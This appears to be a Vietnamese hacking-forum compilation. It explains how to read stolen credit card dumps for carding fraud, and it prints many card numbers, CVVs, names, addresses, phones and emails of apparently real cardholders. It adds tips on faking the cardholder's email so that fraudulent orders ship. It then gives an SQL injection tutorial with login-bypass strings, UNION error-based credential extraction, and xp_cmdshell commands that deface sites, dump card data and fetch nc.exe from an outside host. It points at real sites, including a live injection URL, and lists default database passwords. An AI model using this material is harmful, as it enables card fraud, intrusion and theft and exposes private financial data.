* EXP: Hạn sử dụng: Nằm sau Số thẻ (Card Number) có dạng tháng / năm (ghi bằng 2 chữ số hoặc đầy đủ) - Ví dụ: 03 | 10
trong đó 03 là tháng và 10 là năm (2010) hoặc 03 | 2010
* CVN (CVV2) : Card Verification Number : gồm 3 chữ số ( AMEX có 4 chữ số ) - Thường nằm sau hạn sử dụng (EXP) đối với
CC không có đầy đủ thông tin
* Zip code (Postal code) :là 5 chữ số nếu CC ở USA.Từ Zip code có thể tìm được ra tên City và State tại
http://local.yahoo.com . Nếu CC ở nước khác –> Dựa vào kinh nghiệm xem cc của bạn
* Nếu chỉ có City mà không biết Bang (State) nằm ở đâu thì có thể vào Google đánh tên City vào sẽ ra tên Bang
Ví dụ 1 CCV:
(Dạng không đầy đủ thông tin)
| 53015 | 4868300255130301 | 6 | 2011 | 176 | Mark | Carlin | 800 W. Caffery Apt 1 | Pharr | Texas | 78577 | 956-739-4424 |
mcarlin76@yahoo.com | United States |
Trong đó | 53015 | đừng nghĩ là số Zip Code nhé, đó là số thứ tự CC nằm trong danh sách CC thôi (Bỏ nó đi)
Trong đó | 4868300255130301 | là số thẻ (Number Card) từ số 4 đầu tiên ta có thể nhận biết rằng CC này thuộc loại VISA
Trong đó | 6 | 2011 | chính là EXP (hạn sử dụng của CC) - EXP Date
Trong đó | 176 | nằm sau EXP chính là số CVV2, CVN, CVV (ở một số shop có thể gọi khác nhau nhưng nó luôn nằm sau khi
nhập EXP hoặc Tên trên thẻ (Name on Card)
Trong đó | Mark | Carlin | - Mark chính là First Name, Carlin là Last Name
Trong đó | 800 W. Caffery Apt 1 | là địa chỉ của chủ thẻ (Địa chỉ thường bắt đầu bằng 1 số và kết thúc bằng St. - Drive - Road
{số bất kỳ} - Apt {số bất kỳ} - Dr. - Rd. - Box {số bất kỳ}... )
Trong đó | Pharr | chính là tên City (Thành phố) thường nằm sau Địa chỉ và kế đến là State (Bang)
Và | Texas | chắc chắn là State (Bang) - nếu may mắn bạn có thể gặp những Bang quen thuộc nên việc đọc CC sẽ dễ hơn
* Lưu ý phần State : Có thể trong một số CC State (Bang) sẽ ghi tên viết tắt, Ví dụ: Texas sẽ ghi là TX, New York sẽ ghi là NY
Tiếp đến | 78577 | sẽ là số Zip Code (luôn luôn là 5 số, đối với một vài CC có số Zip Code là dạng 84578-2658 thì bạn có thể ghi vào nguyên hết hoặc chỉ lấy 5 số đầu)
Kết bên Zip Code là | 956-739-4424 | , đây chính là số điện thoại của chủ thẻ (Phone Number), một vài CC còn ghi liên tiếp
nhau không có dấu ' - ' nhưng vẫn đủ 11 số ( có vài shop khi điền Phone Number thì sẽ chia ra từng khung theo dạng
[XXX]-[XXX]-[XXXX] )
Vừa nhìn vào | mcarlin76@yahoo.com | cũng biết đây chính là Email của chủ thẻ (Trong khi ship tuyệt đối không dùng email của chủ thẻ mà hãy đăng ký một Email trùng tên với chủ thẻ , ví dụ ở đây ta có thể vào Yahoo đăng ký 1 Email tên mcarlin776@yahoo.com ) và phải nhớ Email này để kiểm tra xem ship có thành công hay không.
Và cái cuối cùng là | United States | , đây là tên Quốc Gia đăng ký CC
Và đây là một dạng CCV đầy đủ thông tin:
First Name: Michael
Last Name: Vogel
Company:
Address: 2358 Rosina Dr.
Address 2:
City/Town: Miamisburg
State/Province (US-CDN-AU): OH
Zip / Postal Code: 45342
Country: USA
Phone: 937-859-1668
Fax:
E-mail: ohiostatefn@yahoo.com
Payment Method : Visa
Credit Card : 4121742602096953
Exp. Date : 09/09
CVV2# : 435
(Có 1 số CVV còn có cả Password của Email chủ thẻ, điều này khiến việc ship thành công ở mức cao hơn)
* Một vài CCV làm ví dụ:
|4264290423170877|03|09|527|||Duncan|McCormick|||7 01-857-7996|PO Box 1095|Minot|58702|ND|UNITED STATES|
12:00 AM|VISA| 4640182035183692 |03|10|945|Michael|Stamm|413-586-5354|22 Whittier Street|Florence|01062|MA|USA
711934 | Visa | 4190028630369166 | 11 | 2009 | 591 | tom | hall | | 4017 somerset circle | | casper | WY | 82609 | 3074738469 |
(CCV này có số điện thoại liền nhau, bang viết tắt (WY) là Wyoming, địa chỉ theo dạng bình thường là {số nhà} + {tên đường}
và kế bên là | | ,các bạn đừng hiểu lầm là CC này thiếu thông tin, thật ra đó là Address 2 nhưng nó không cần thiết nên nó
được để trống )
* Các CCV trên đều không có Email vì Email không quan trọng trong việc ship đồ nên các bạn đừng lo (trừ 1 vài trường hợp)
50141 | 4549972363284647| 03 | 2010 | 379 | Ariel L. | Alvarez | PO Box 1377 | Anasco | PR | 00610 | (787)691-1033 | United
States | Boywonder | valerugo@prtc.net
(Trong CCV này First Name của chủ thẻ ghi thiếu hay sao thế nhỉ??, Không phải đâu, Ariel chính là First Name của chủ thẻ
còn L. chính là Tên lót (tên đệm - Middle name) nhưng do shop không có chỗ ghi nên có thể ghi chung vào phần First Name)
* Một CCN ví dụ:
| 5713 | bradley | scruggs | 1301 Williamsburg Dr | | Schaumburg | IL | United States | 60193 | (678) 463-4767 | | |
bks926687@comcast.net | VISA | 4610-0747-4993-4666 | 07/10 | Mar 29 2009 4:48PM
(CCN chỉ khác CCV là không có số Mã bảo mật mà thôi và cũng còn nhiều sự khác nhau về giá trị nhưng các bạn tự tìm hiểu
nhé)
READMORE
CCV và CCN
CCV là Credit Card Verify ( hoặc là CVV2, CVV, CVN cũng chính là 1)
CC dạng này thì phải có 1 mã số bảo vệ đi kèm theo khi thanh toán nên loại này rất quý và sử dụng cũng rộng rãi
CCN theo dân UG Việt Nam gọi là CC non (CC dạng này không có mã số bảo vệ)
Một cái CC hợp lệ phải bao gồm đầy đủ các yếu tố sau :
+ Name on Card hay Card holder : Họ tên chủ thẻ .
+ Billing or Mailing Address : Địa chỉ .
+ City : Thành phố .
+ State : Bang ( của US và Canada ) .
+ Zip Code ( Post code ) : Mã vùng .
+ Card number : Số thẻ .
+ Card Exp date : Ngày hết hạn của thẻ .
và có thể có vài thành phần khác như :
+ Phone number : Số phone ( 11 số ) .
+ Fax Number : Số Fax ( 11 số ) .
+ CVV2 hay CVN : cái này là mã số bảo mật in trên CCV .
* CC Number (Card Number): gồm 16 chữ số ( Riêng American Express có 15 số)
Nếu chữ số đầu tiên của dãy là :
4 –> VISA
5 –> Master Card (MC)
6 –> Discover (Dis)
3 –> American Express (AMEX)
Trong đó VISA, Master Card, Discover và American Express là loại thẻ
* EXP: Hạn sử dụng: Nằm sau Số thẻ (Card Number) có dạng tháng / năm (ghi bằng 2 chữ số hoặc đầy đủ) - Ví dụ: 03 | 10
trong đó 03 là tháng và 10 là năm (2010) hoặc 03 | 2010
* CVN (CVV2) : Card Verification Number : gồm 3 chữ số ( AMEX có 4 chữ số ) - Thường nằm sau hạn sử dụng (EXP) đối với
CC không có đầy đủ thông tin
* Zip code (Postal code) :là 5 chữ số nếu CC ở USA.Từ Zip code có thể tìm được ra tên City và State tại
http://local.yahoo.com . Nếu CC ở nước khác –> Dựa vào kinh nghiệm xem cc của bạn
* Nếu chỉ có City mà không biết Bang (State) nằm ở đâu thì có thể vào Google đánh tên City vào sẽ ra tên Bang
Ví dụ 1 CCV:
(Dạng không đầy đủ thông tin)
| 53015 | 4868300255130301 | 6 | 2011 | 176 | Mark | Carlin | 800 W. Caffery Apt 1 | Pharr | Texas | 78577 | 956-739-4424 |
mcarlin76@yahoo.com | United States |
Trong đó | 53015 | đừng nghĩ là số Zip Code nhé, đó là số thứ tự CC nằm trong danh sách CC thôi (Bỏ nó đi)
Trong đó | 4868300255130301 | là số thẻ (Number Card) từ số 4 đầu tiên ta có thể nhận biết rằng CC này thuộc loại VISA
Trong đó | 6 | 2011 | chính là EXP (hạn sử dụng của CC) - EXP Date
Trong đó | 176 | nằm sau EXP chính là số CVV2, CVN, CVV (ở một số shop có thể gọi khác nhau nhưng nó luôn nằm sau khi
nhập EXP hoặc Tên trên thẻ (Name on Card)
Trong đó | Mark | Carlin | - Mark chính là First Name, Carlin là Last Name
Trong đó | 800 W. Caffery Apt 1 | là địa chỉ của chủ thẻ (Địa chỉ thường bắt đầu bằng 1 số và kết thúc bằng St. - Drive - Road
{số bất kỳ} - Apt {số bất kỳ} - Dr. - Rd. - Box {số bất kỳ}... )
Trong đó | Pharr | chính là tên City (Thành phố) thường nằm sau Địa chỉ và kế đến là State (Bang)
Và | Texas | chắc chắn là State (Bang) - nếu may mắn bạn có thể gặp những Bang quen thuộc nên việc đọc CC sẽ dễ hơn
* Lưu ý phần State : Có thể trong một số CC State (Bang) sẽ ghi tên viết tắt, Ví dụ: Texas sẽ ghi là TX, New York sẽ ghi là NY
Tiếp đến | 78577 | sẽ là số Zip Code (luôn luôn là 5 số, đối với một vài CC có số Zip Code là dạng 84578-2658 thì bạn có thể ghi vào nguyên hết hoặc chỉ lấy 5 số đầu)
Kết bên Zip Code là | 956-739-4424 | , đây chính là số điện thoại của chủ thẻ (Phone Number), một vài CC còn ghi liên tiếp
nhau không có dấu ' - ' nhưng vẫn đủ 11 số ( có vài shop khi điền Phone Number thì sẽ chia ra từng khung theo dạng
[XXX]-[XXX]-[XXXX] )
Vừa nhìn vào | mcarlin76@yahoo.com | cũng biết đây chính là Email của chủ thẻ (Trong khi ship tuyệt đối không dùng email của chủ thẻ mà hãy đăng ký một Email trùng tên với chủ thẻ , ví dụ ở đây ta có thể vào Yahoo đăng ký 1 Email tên mcarlin776@yahoo.com ) và phải nhớ Email này để kiểm tra xem ship có thành công hay không.
Và cái cuối cùng là | United States | , đây là tên Quốc Gia đăng ký CC
Và đây là một dạng CCV đầy đủ thông tin:
First Name: Michael
Last Name: Vogel
Company:
Address: 2358 Rosina Dr.
Address 2:
City/Town: Miamisburg
State/Province (US-CDN-AU): OH
Zip / Postal Code: 45342
Country: USA
Phone: 937-859-1668
Fax:
E-mail: ohiostatefn@yahoo.com
Payment Method : Visa
Credit Card : 4121742602096953
Exp. Date : 09/09
CVV2# : 435
(Có 1 số CVV còn có cả Password của Email chủ thẻ, điều này khiến việc ship thành công ở mức cao hơn)
* Một vài CCV làm ví dụ:
|4264290423170877|03|09|527|||Duncan|McCormick|||7 01-857-7996|PO Box 1095|Minot|58702|ND|UNITED STATES|
12:00 AM|VISA| 4640182035183692 |03|10|945|Michael|Stamm|413-586-5354|22 Whittier Street|Florence|01062|MA|USA
711934 | Visa | 4190028630369166 | 11 | 2009 | 591 | tom | hall | | 4017 somerset circle | | casper | WY | 82609 | 3074738469 |
(CCV này có số điện thoại liền nhau, bang viết tắt (WY) là Wyoming, địa chỉ theo dạng bình thường là {số nhà} + {tên đường}
và kế bên là | | ,các bạn đừng hiểu lầm là CC này thiếu thông tin, thật ra đó là Address 2 nhưng nó không cần thiết nên nó
được để trống )
* Các CCV trên đều không có Email vì Email không quan trọng trong việc ship đồ nên các bạn đừng lo (trừ 1 vài trường hợp)
50141 | 4549972363284647| 03 | 2010 | 379 | Ariel L. | Alvarez | PO Box 1377 | Anasco | PR | 00610 | (787)691-1033 | United
States | Boywonder | valerugo@prtc.net
(Trong CCV này First Name của chủ thẻ ghi thiếu hay sao thế nhỉ??, Không phải đâu, Ariel chính là First Name của chủ thẻ
còn L. chính là Tên lót (tên đệm - Middle name) nhưng do shop không có chỗ ghi nên có thể ghi chung vào phần First Name)
* Một CCN ví dụ:
| 5713 | bradley | scruggs | 1301 Williamsburg Dr | | Schaumburg | IL | United States | 60193 | (678) 463-4767 | | |
bks926687@comcast.net | VISA | 4610-0747-4993-4666 | 07/10 | Mar 29 2009 4:48PM
(CCN chỉ khác CCV là không có số Mã bảo mật mà thôi và cũng còn nhiều sự khác nhau về giá trị nhưng các bạn tự tìm hiểu
nhé)
Tạo số điện thoại bên Mỹ
Bài viết này tôi hướng dẫn sử dụng phần mềm Blink bởi vì tôi thấy nó rất đơn giản. Trước mắt tôi không biết cách gọi điện từ phần mềm này nhưng bạn có thể nhận được cuộc gọi một cách dễ dàng. Cách sử dụng như sau :
READMORE
SQL Injection 1
Vào www.google.com.vn đánh vào
chọn đại 1 site để hack nèo :http://www.avenuearabella.com/shop/s...ucts.asp?cat=1 nhé
READMORE
chọn đại 1 site để hack nèo :http://www.avenuearabella.com/shop/s...ucts.asp?cat=1 nhé
Hack database qua SQL Injection
Hầu hết các chương trình ứng dụng web mới đều dựa trên cấu trúc dữ liệu động để để đạt được tính hấp dẫn của các chương trình desktop cổ điển. Cơ chế động này đạt được bằng cách thu thập dữ liệu từ 1 database. Một trong những nền database phổ biến hơn cả trong các ứng dụng e-shop là SQL. Rất nhiều các ứng dụng web chỉ dựa hoàn toàn vào những scripts ở đầu vào ( phía người dùng - client ), những đoạn scripts này chỉ đơn giản là truy vấn 1 SQL database nằm ở ngay trên webserver hay nằm trên 1 hệ thống đầu cuối ( phía server ) riêng biệt. Một trong những cách tấn công khó bị nhận thấy và nguy hiểm nhất lên 1 ứng dụng web bao gồm việc chiếm đoạt những chuỗi truy vấn được dùng bởi các scripts, để đoạt quyền điểu khiển ứng dụng đó hoặc các dữ liệu của nó. Một trong những cơ chế hiệu quả nhất để đạt được điều đó là một kỹ thuật gọi là SQL injection ( kỹ thuật chèn những câu lệnh SQL )
Cơ sở dữ liệu là trái tim của một website thương mại. Một cuộc tấn công vào server lưu giữ CSDL có thể gây ra thất thoát lớn về tài chính cho công ty. Thông thường CSDL bị hack để lấy các thông tin về thẻ tín dụng. Chỉ cần một cuộc tấn công sẽ làm giảm uy tín và lượng khách hàng bởi vì họ muốn thông tin về CC của mình được an toàn. Hầu hết các website thương mại dùng Microsoft SQL (MSSql) và Oracle. MSSQL vẫn đang chiếm ưu thế trên thị trường vì giá thành rẻ. Trong khi Oracle server được bán mắc hơn. Oracle đã từng tuyên bố là "không thể xâm nhập được", nhưng những hacker coi đó như là 1 lời thách thức và đã tìm ra rất nhiều lỗi trong Oracle server..
Bài viết được chia làm 2 phần
1. Dùng HTTP cổng 80
2. Dùng MS SQL cổng 1434
Phần 1 - Dùng cổng 80 HTTP
----------------------------------------------------------------
Kiến thức trong phần này hữu ích không chỉ đối với các hacker mà còn với những người thiết kế web. Chỉ cần một lỗi thông thường tạo ra bởi người thiết kế web có thể làm lộ thông tin về CSDL của server cho hacker. Toàn bộ mục đích của trò chơi là các chuỗi truy vấn. Người đọc coi như có kiến thức về các truy vấn và ngôn ngữ asp ( active server pages ). Thêm nữa là cách tấn công này thường chỉ cần dùng bằng 1 trình duyệt internet. Vì vậy bạn không cần bất cứ một tool nào ngoại trừ IE hay Netscape.
Thông thường, để làm 1 trang đăng nhập, người thiết kế web sẽ viết 1 đoạn mã như sau:
login.htm
<html>
<body>
<form method=get action="logincheck.asp">
<input type="text" name="login_name">
<input type="text" name="pass">
<input type="submit" value="sign in">
</form>
</body>
</html>
File logincheck.asp nằm trên server dùng để kiểm tra thông tin do user nhập vào có nội dung:
logincheck.asp
<@language="vbscript">
<%
dim conn,rs,log,pwd
log=Request.form("login_name")
pwd=Request.form("pass")
set conn = Server.CreateObject("ADODB.Connection")
conn.ConnectionString="provider=microsoft.jet.OLED B.4.0;data source=c:\folder\multiplex.mdb"
conn.Open
set rs = Server.CreateObject("ADODB.Recordset")
rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn
If rs.EOF
response.write("Login failed")
else
response.write("Login successful")
End if
%>
Thoạt tiên đoạn code trên có vẻ ổn. 1 người dùng type username và pass trong trang login.htm và click 'Submit'. Giá trị được type vào sẽ được browser chuyển về cho logincheck.asp kiểm tra bằng cách dùng câu truy vấn "Select * from table1 where login='"&log& "' and password='" &pwd& "' ".
Mọi thứ có vẻ OK ? Chuỗi truy vấn cũng OK. Nhưng nếu 1 trang login được làm như thế thì 1 hacker sẽ có thể dễ dàng đăng nhập mà không cần một password hợp lệ nào đó. Nhìn lại chuỗi truy vấn:
"Select * from table1 where login='"&log& "' and password='" &pwd& "' "
Nếu 1 user type tên đăng nhập là "hack" và mật khẩu là "passne" thì những giá trị này sẽ được chuyển cho trang asp với method "POST" và câu truy vấn trên trở thành:
"Select * from table1 where login=' hack' and password=' passne ' "
Tốt. Nếu như có 1 dòng chứ login name "hack" và password "passne" trong CSDL thì chúng ta sẽ nhận được thông báo đăng nhập thành công. Nhưng nếu như type loginname là "hack" và password là hi' or 'a'='a' trong phần password ? Câu truy vấn sẽ trở thành:
"Select * from table1 where login=' hack' and password=' hi' or 'a'='a ' "
Click 'Submit' và Bingo, đăng nhập thành công. Chuỗi truy cập được thoả mãn khi điều kiện là password bằng 'hi' HOẶC 'a'='a'. Điều này luôn đúng và hacker sẽ đăng nhập với nick 'hack'. Có thể thử các chuỗi sau đây trong ô password nếu cách trên không làm được với một số website:
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Dấu -- được thêm vào làm cho phần còn lại của chuỗi truy vấn trở thành 'chú thích' nên các điều kiện khác sẽ không bị kiểm tra. Tương tự có thể dùng:
hack' --
hack" --
hoặc những username khác và chọn lựa password bất kỳ để có thể đăng nhập được. Bởi vì trong câu truy vấn chỉ có phần username được kiểm tra là 'hack' và phần còn lại bị bỏ đi do có dấu -- . Nếu may mắn gặp được vào những website mà người thiết kế web đã mắc những lỗi trên, và bạn có thể login với bất kỳ username nào.
Cách tấn công cao cấp hơn: dùng các thông báo lỗi của ODBC
--------------------------------------------------------------
Theo trên ta có thể thấy cách login mà không cần phải biết bất cứ 1 password nào. Dưới đây là cách để đọc toàn bộ CSDL chỉ bằng cách dùng các truy vấn trong URL. Cách này chỉ thực hiện được đối với IIS servers, nghĩa là với các trang asp. Và IIS được sử dụng trong gần 35% các ứng dụng thương mại web. Vì vậy chắc chắn bạn sẽ tìm ra 1 nạn nhân sau khi chỉ search một vài website. Thí dụ như:
http://www.nosecurity.com/mypage.asp?id=45
trong URL, dấu '?' cho thấy đằng sau nó, giá trị 45 sẽ được chuyển cho 1 thông số ẩn. Chúng ta hãy xem lại ví dụ trên, trang login.htm có 2 form input dạng text tên là 'login_name' và 'pass', và các giá trị của 2 form này sẽ được chuyển cho logincheck.asp
Việc đăng nhập thành công cũng có thể thực hiện bằng cách mở trực tiếp trang logincheck.asp bằng cách dùng link:http://www.nosecurity.com/loginchec...ack&pass=passne nếu method là GET thay vì POST ( save html lại và sửa POST bằng GET )
Lưu ý: sự khác nhau giữa GET và POST là POST sẽ không hiện ra các giá trị được chuyển sang trang sau trên URL trong khi GET làm hiện lên các giá trị này. Để biết thêm về GET và POST nên đọc thêm RFC 1945 và 2616 trong giao thức HTTP
Sau dấu '?' thì các biến được dùng trong trang logincheck.asp sẽ được gán bằng giá trị hacker type vào. Trong URL trên thì login_name sẽ được gán với giá trị hack. Các giá trị khác nhau được ngăn cách bởi dấu '&'
Quay trở lại trang index.htm, biến id có thuộc tính ẩn và tuỳ theo những link người dùng click, giá trị của id sẽ thay đổi. Giá trị này sẽ được chuyển vào trong câu truy vấn mypage.asp và user sẽ được trả về trang mình muốn. Ứng với giá trị của 'id' là 46 sẽ có một trang khác.
Chúng ta bắt đầu hack: type thêm vào trên URL câu truy vấn sau:
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
information_schema.tables là một table hệ thống chứa thông tin về tất cả table của server. Trong đó có một field table_name chứa tất cả tên của các table. Chuỗi query SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES trả về giá trị là tên của table đầu tiên với kiểu string (nvarchar) trong INFORMATION_SCHEMA.TABLES, và chúng ta lại gộp nó 45 là một giá trị số. Vì vậy server sẽ thông báo lỗi:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'logintable' to a column of data type int. /mypage.asp, line
Trong thông báo lỗi trên ta nhận được một table là 'logintable'. Table này có thể chứa tên truy cập và password của các user. Tiếp tục type câu lệnh sau lên URL:
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--
Tương tự table_name, column_name cũng là 1 field trong table hệ thống INFORMATION_SCHEMA.COLUMNS chứa tất cả tên các column. Và ta đang gộp tên của column đầu tiên trong table 'logintable' với giá trị 45, nên sẽ có thông báo lỗi:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int. /index.asp, line 5
Thông báo lỗi cho thấy column đầu tiên trong 'logintable' là 'login_id', để lấy tên của column thứ 2:
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int. /index.asp, line 5
Chúng ta có thêm 1 column nữa là 'login_name', tiếp tục lấy column thứ 3
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'passwd' to a column of data type int. /index.asp, line 5
Đây là thông tin ta cần có: password login. Bước kế tiếp là lấy thông tin login và password từ table 'logintable', type;
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Rahul' to a column of data type int. /index.asp, line 5
Đây rồi: 1 trong những login name là 'Rahul', câu lệnh lấy password của user Rahul sẽ là:
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 password FROM logintable where login_name='Rahul'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'P455w0rd' to a column of data type int. /index.asp, line 5
OK, tên truy cập : Rahul và mật khẩu là p455w0rd. Ta đã crack được CSDL củawww.nosecurity.com. Và điều này nhờ vào server đã không lọc dữ liệu truy vấn của người dùng. Lỗi SQL này vẫn còn gặp ở nhiều website, và phương pháp phòng chống tốt nhất là phân tích những request của user và lọc đi các ký tự như ', ", --, : ....
Phần 2: dùng cổng 1434 ( cổng giao tiếp SQL )
------------------------------------------------------
Chúng ta đã thấy cách làm thế nào để xâm nhập vào CSDL bằng cách dùng các malformed URL và chỉ bằng cổng 80 ( cổng http ). Sau đây ta sẽ hack database dùng port 1434. Trước khi hack chúng ta nên biết thật sự các database server là gì và hoạt động như thế nào, cùng với cách khai thác chúng.
Những người thiết kết MS SQL tạo ra một số thủ tục mặc định được lưu sẵn chung với sản phẩm của mình để giúp cho webdesigner linh động hơn. Các thủ tục này không có gì khác mà chính là các lớp hàm, được dùng để thực hiện những nhiệm vụ nào đó dựa trên các biến được truyền cho chúng. Chính những thủ tục này rất quan trọng đối với hacker, 1 số trong đó gồm:
sp_passsword -> đổi password cho 1 tên truy cập (login name) nào đó
VD: EXEC sp_password ‘oldpass’, ‘newpass’, ‘username’
sp_tables -> hiển thị tất cả table trong database hiện tại
VD: EXEC sp_tables
xp_cmdshell -> cho phép chạy câu lệnh bất kỳ lền server với quyền admin của database ( cái này quan trọng nhất, vì thông thường database được cài mặc định với quyền root )
xp_msver -> hiển thị version của SQL server và tất cả thông tin về HĐH được sử dụng.
xp_regdeletekey -> xoá một key trong registry của windows
xp_regdeletevalue -> xoá một giá trị trong registry
xp_regread -> in 1 giá trị trong registry lên màn hình
xp_regwrite -> gán 1 giá trị mới cho 1 key
xp_terminate_process -> ngừng một process nào đó
Đây là một số các lệnh quan trọng. Thật ra có hơn 50 loại thủ tục như thế. Nếu muốn database được an toàn thì điều nên làm là xoá tất cả những thủ tục đó đi bằng cách mở Master database dùng chương trình MS SQL Server Enterprise Manager. Mở folder Extended Stored Procedures và xoá các thủ tục lưu trong đó bằng cách nhấn chuột phải và chọn delete
Lưu ý:"Master" là một database quan trọng của SQLchứa tất cả thông tin về hệ thống như là login name và các thủ tục có sẵn. Nếu 1 hacker xoá master database thì SQL server sẽ bị down vĩnh viễn. Ngoài "Master" db ra còn có "Syslogins" là table hệ thống mặc định chứ tất cả username và password để login vào db ( user của db khác user của ứng dụng web ). Điều nguy hiểm nhất trong MS SQL là MS SQL mặc định có một user là "sa" với password "" ( không có pass )
Tiếp theo là cách hack db. Đầu tiên ta cần tìm ra một server bị lỗi. Download 1 chương trình scan port và scan 1 dãy ip để tìm ip có port 1433 hoặc 1434 ( tcp hay udp ) mở. Đây là port dùng bởi MS SQL server. Ngoài ra port của Oracle server là 1512. VD như chúng ta tìm được một server có ip là 198.188.178.1, có rất nhiều cách để dùng các dịch vụ của SQL như là dùng telnet hoặc netcat tới port 1433/1434. Ngoài ra có thể dùng một tool tên là osql.exe được kèm theo với các SQL server 2000. Mở DOS prompt và type vào:
Cosql.exe -?
osql: unknown option ?
usage: osql [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w columnwidth]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-L list servers] [-c cmdend]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-n remove numbering] [-m errorlevel]
[-r msgs to stderr] [-V severitylevel]
[-i inputfile] [-o outputfile]
[-p print statistics] [-b On error batch abort]
[-O use Old ISQL behavior disables the following]
<EOF> batch processing
Auto console width scaling
Wide messages
default errorlevel is -1 vs 1
[-? show syntax summary]
Đây là help file cho osql. Tiếp tục:
C:\> osql.exe –S 198.188.178.1 –U sa –P “”
Nếu chung ta nhận được dấu nhắc
1>
có nghĩa là login thành công, nếu không sẽ có thông báo lỗi login sai đối với user "sa"
Tới đây nếu ta muốn chạy bất kỳ câu lệnh nào đó lên server, chỉ cần dùng thủ tục "xp_cmdshell" như sau:
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘dir >dir.txt’”
Tôi khuyến khích việc dùng -Q thay vì -q bởi vì chúng ta sẽ exit khỏi server ngay sau khi câu lệnh được thực hiện. Tương tự ta có thể chạy bất cứ một câu lệnh nào lên server. Một hacker thông minh còn có thể install backdoor nhằm để tiếp tục access vào server sau này. Ta cũng có thể dùng “information_schema.tables” để lấy list các tables và nội dung của chúng bằng cách:
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from information_schema.tables”
Kiếm thông tin login trong các table như login, accounts, users ...
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from users”
và lấy thông tin về username cùng với credit card.
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select username, creditcard, expdate from users”
Output:
Username creditcard expdate
----------- ------------ ----------
Jack 5935023473209871 2004-10-03 00:00:00.000
Jill 5839203921948323 2004-07-02 00:00:00.000
Micheal 5732009850338493 2004-08-07 00:00:00.000
Ronak 5738203981300410 2004-03-02 00:00:00.000
Có thể deface website bằng cách chạy lệnh sau ( chỉ trong trường hợp database server được install chung với webserver )
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘echo defaced by hack> C:\inetpub\wwwroot\index.html’”
Upload file lên server dùng tftp:
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘tftp 203.192.16.12 GET nc.exe c:\nc.exe’”
Để download một file nào đó ta có thể dùng lệnh PUT thay vì GET, bởi vì các câu lệnh này sẽ được thực hiện trên server chứ không fải ở máy chúng ta. Nếu ta dùng GET, câu lệnh sẽ thực hiện trên server và sẽ download nc.exe từ máy của chúng ta tới server.
Tools dùng hack các SQL pass có rất nhiều trên web. Ngay cả lỗi tràn bộ đệm cũng có thể được dùng để điêu khiển hoàn toàn một hệ thống với quyền admin. Bài viết này chỉ đề cập một số vấn đề tổng quát về db server.
• Remember the Sapphire worm? Which was released on 25th Jan. The worm which exploited three known vulnerabilities in the SQL servers using 1433/1434 UDP ports.
Phương pháp phòng chống
---------------------------
<*> Đổi password mặc định của user "sa"
<*> Xoá tất cả các thủ tục được mặc định lưu trữ trên server
<*> Lọc những ký tự như ',",--,: ...
<*> Update SQL với những bản mới nhất
<*> Khoá các port SQL bằng cách dùng firewall
Một số website về SQL security"
http://sqlsecurity.com/
http://www.cert.com/
Any comments and good criticism is always accepted at guatehack@linuxmail.org
[End of Original Message]
1. Một số password default cho các super-user:
Oracle sys: oracle
mySQL (Windows) root:null
MS SQL Server sa:null
DB2 dlfm:ibmdb2
2. Collection các tool dùng cho SQL:
SQLTools.zip ---------> www.lebuudan.net/SQLTools.zip
Bao gồm:
SQLcracker + passlist + userlist
SQLdos.exe
SQLscanner.exe
SQLping.exe
and more.
3.OSQL.exe nằm trong bộ MSDE của microsoft, nhưng tới 64Mb lận, có ai cần thì tui upload lên. Hông thì thui, host nhỏ xíu hà.
4. ebook/text :
ebook: http://www.hackersplayground.org/books.html
text: http://www.hackersplayground.org/papers.html
SQLinjection: http://www.hackersplayground.org/papers.html
dùng chung một em source nên .....anh em đừng chém, vẫn còn bảng INFORMATION_SCHEMA.COLUMNS nên anh em từ từ khai thác.
tham khảo thêm :http://www.hvaonline.net/hvaonline/posts/list/10020.hva
http://samcuhanquoc.com.vn/index.php?aacecom=articles&act=list&cid=-203%20union%20select%201,2--
